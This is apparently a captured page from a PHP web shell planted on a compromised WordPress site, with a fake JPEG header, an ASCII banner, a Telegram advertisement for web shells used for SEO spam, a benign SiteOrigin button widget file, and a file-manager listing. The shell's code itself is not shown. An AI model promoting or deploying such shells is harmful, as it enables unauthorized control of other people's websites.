����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
class SiteOrigin_Panels_Widget_Button extends SiteOrigin_Panels_Widget {
function __construct() {
parent::__construct(
__('Button (PB)', 'siteorigin-panels'),
array(
'description' => __('A simple button', 'siteorigin-panels'),
'default_style' => 'simple',
),
array(),
array(
'text' => array(
'type' => 'text',
'label' => __('Text', 'siteorigin-panels'),
),
'url' => array(
'type' => 'text',
'label' => __('Destination URL', 'siteorigin-panels'),
),
'new_window' => array(
'type' => 'checkbox',
'label' => __('Open In New Window', 'siteorigin-panels'),
),
'align' => array(
'type' => 'select',
'label' => __('Button Alignment', 'siteorigin-panels'),
'options' => array(
'left' => __('Left', 'siteorigin-panels'),
'right' => __('Right', 'siteorigin-panels'),
'center' => __('Center', 'siteorigin-panels'),
'justify' => __('Justify', 'siteorigin-panels'),
)
),
)
);
}
function widget_classes($classes, $instance) {
$classes[] = 'align-'.(empty($instance['align']) ? 'none' : $instance['align']);
return $classes;
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| presets | Folder | 0755 |
|
|
| styles | Folder | 0755 |
|
|
| tpl | Folder | 0755 |
|
|
| button.php | File | 1.14 KB | 0644 |
|